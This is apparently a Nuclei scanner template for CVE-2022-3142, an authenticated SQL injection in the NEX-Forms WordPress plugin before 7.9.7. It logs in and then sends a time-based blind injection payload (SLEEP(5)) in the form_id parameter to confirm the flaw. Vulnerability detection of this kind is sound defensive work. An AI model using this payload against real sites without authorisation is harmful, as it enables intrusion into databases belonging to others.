id: CVE-2022-3142

info:
  name: NEX-Forms Plugin < 7.9.7 - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.
  remediation: Fixed in version 7.9.7
  reference:
    - https://wpscan.com/vulnerability/8acc0fc6-efe6-4662-b9ac-6342a7823328/
    - https://www.exploit-db.com/exploits/51042
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3142
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cwe-id: CWE-89
    cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
  tags: cve,cve2022,wordpress,sqli,wp-plugin,wp,wpscan,authenticated

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        @timeout: 30s
        GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)-- HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code_2 == 200'
          - 'contains(body_2, "NEX-Forms")'
          - 'contains(content_type_2, "text/html")'
        condition: and